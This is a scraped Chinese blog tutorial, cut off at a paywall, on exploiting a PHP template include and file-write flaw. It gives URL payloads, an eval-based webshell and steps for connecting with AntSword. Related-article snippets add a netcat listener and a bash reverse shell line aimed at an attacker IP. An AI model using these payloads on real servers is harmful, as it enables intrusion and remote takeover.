中国蚁剑连接远程shell

最新推荐文章于 2024-05-20 10:02:33 发布
最新推荐文章于 2024-05-20 10:02:33 发布
阅读量2.9k 收藏 5
点赞数
文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48823354/article/details/108603150
版权
该博客介绍了如何通过构造参数利用漏洞创建并写入webshell,详细步骤包括:利用display()方法实现任意内容包含,使用fetch()方法进行任意文件写入,成功加载phpinfo,并在服务器上写入webshell,最后连接蚁剑进行远程控制。
摘要由CSDN通过智能技术生成

1、通过构造a参数的display()方法,实现任意内容包含漏洞

?a=display&templateFile=README.md
在这里插入图片描述

通过构造a参数的fetch()方法,不需要知道文件路径就可以实现任意文件写入

?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
执行,页面是空白的
在这里插入图片描述

访问test.php,可以看到phpinfo已经加载出来

在这里插入图片描述

创建自己的webshell

1.<?php @eval($_POST[a]);?>

在服务器上写入webshell

?a=fetch&templateFile

最低0.47元/天 解锁文章
眼泪丢了
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
shell连接工具windows
05-21
shell工具,操作工具shell工具,操作工具shell工具,操作工具shell工具,操作工具shell工具,操作工具shell工具,操作工具
shell连接
m0_49392300的博客
03-01 412
当我们从一个数据库倒数入另一个数据库时, 用到shell 首先 db2 connect to 库名1 db2 connect to 库名 2 export.....表名.sql...,select* from表名 import..... OK了,灌进了
中国蚁剑的下载与安装
最新发布
weixin_42515203的博客
05-20 722
网络安全工具之中国蚁剑的下载与安装及简单使用。
shell链接
weixin_30338743的博客
10-11 190
5个实用的shell脚本面试题和答案: http://www.cnblogs.com/xinjie10001/p/6395945.html linux shell 逻辑运算符、逻辑表达式详细介绍: http://www.jb51.net/article/47327.htm 48个shell小技巧: http://www.jb51.net/article/53967.htm tcpdum...
连接Xshell
weixin_30446613的博客
03-01 92
连xshell之前先进入[root@localhost zxj]# vim /etc/ssh/sshd_config, 将115行删除注释改为UseDNS no, 保存重启sshd(xshell)的配置文件【[root@localhost zxj]# systemctl restart sshd】,xshell是就可快速连接。 转载于:https://www.cnblogs.com/...
shell远程连接工具
08-11
Shell远程连接工具是一种用于在本地计算机上通过网络与远程服务器进行交互的软件。在这个场景下,我们关注的是“xshell7”,这是一款流行的Linux/Unix系统远程管理工具,尤其受到IT专业人员的喜爱。Xshell 7 提供了...
.rar 网络安全工具 shell工具
03-20
这种通过Webshell进行的远程操作往往依赖于特定的Shell语法,因此,熟悉Shell语言是使用的关键。 在实际使用过程中,需要注意的是,虽然提供了强大的功能,但必须在合法授权下使用,否则可能触犯法律。在...
getshell神器-,包含Linux windows双系统
08-10
2. **Webshell管理**:的核心功能是对Webshell的管理,它能帮助你连接、上传、下载、执行命令,甚至创建自定义命令,极大地提高了渗透测试的效率。 3. **强大的命令执行**:内置了多种系统命令,可以直接在...
Java调用远程Shell脚本
02-28
综上所述,Java调用远程Shell脚本涉及的主要知识点包括:SSH协议,Ganymed SSH-2库的使用,建立SSH连接,执行远程命令,处理输出,以及参数的动态配置。在实际应用中,这些技术可以帮助开发者实现远程服务器的自动化...
xshell远程连接系统软件工具安装包
06-07
1. 多协议支持:Xshell不仅支持SSH(Secure Shell)协议,还支持其他如TELNET、RLOGIN、SERIAL等,满足不同环境下的远程连接需求。 2. 安全性:Xshell提供强大的加密技术,确保数据在传输过程中的安全,防止被窃取...
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
Jiuchen的博客
03-16 3364
中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。黑客在你的web服务上植入了WebShell,利用连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来在2023年3月16号读到的我这篇文章,你抱着试试看的态度去尝试了一下,发现
X-SHELL连接Linux
weixin_42298807的博客
08-29 194
1、安装x-shell 官网 https://xshell.en.softonic.com/ 很简单,不赘述 2、打开Linux ssh服务 service ssh start 3、查看Linux IP地址 ifconfig 4、x-shell远程连接 拒绝了,可能是配置文件不允许。 5、重启ssh服务 6、重新连接 成功。 ...
linux连接xshell
weixin_30872499的博客
03-21 875
1. 前言   在前面的文章https://www.cnblogs.com/ajunyu/p/10872595.html提到新建了虚拟机可以通过连接xshell远程操作,这篇文章我们来简单讲解一下虚拟机如何连接xshell。 2. 如何连接xshell   xshell一般是通过ssh协议来连接linux的,需要获得linux的主机地址和密码账户,因此对xshell连接分为两个步骤来进行...
window 上 shell 连接工具
司马懿的西山居
11-18 5809
window上最常用的shell连接工具要数 PuTTY 和 SecureCRT PuTTY 一个很小巧的开源工具,可以将多台主机的IP、端口直接保存到sessions中,下次直接打开即可。此外,如果是虚拟机,可能存在鼠标进出需要加快捷键、复制文本不方便等问题,这些使用PuTTY都能很方便的解决 SecureCRT 这是一款付费软件(要下载注册机)。之所以用到这款软件,是因为遇到一个问题。 我要部署zookeeper集群,多台服务器之间需要进行相同的操作,如果一个个shell切换耗时耗力,而且容易出错。
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1505
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
攻防世界web、web shell关卡使用中国蚁剑
Lu__xiao的博客
11-30 898
访问web shell关卡进入此网站,得到下面一句话 打开,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 连接后在网站目录下可以看到 flag.txt文件 里面放置flag index.php文件 里面放置网站源代码 源代码 flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c} webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
Shell命令连接符-新手必看
Zephyrzh的博客,关注【凡登】成为大厂技术人
10-13 1493
本文介绍shell脚本常用命令连接符:管道符( | )、重定向( < 、>、>>、2> 、&> )、分号(;本文内容同微信公众号【凡登】,关注不迷路,学习上高速,欢迎关注共同学习。
不用怎么反弹shell
12-07
反弹shell是指攻击者通过漏洞获取被攻击主机的shell权限,从而控制被攻击主机。下面是一种不使用的反弹shell方法: 1.攻击者需要在自己的机器上开启监听服务,例如使用netcat命令: ```shell nc -lvnp 4444 ``` 其中4444是监听端口号。 2.攻击者需要在受害主机上执行反弹shell的命令,例如使用bash反弹shell: ```shell bash -i >& /dev/tcp/攻击者IP/4444 0>&1 ``` 其中“攻击者IP”是攻击者机器的IP地址,4444是攻击者机器上开启的监听端口号。 3.当受害主机执行反弹shell命令后,攻击者就可以在自己的机器上获取到受害主机的shell权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值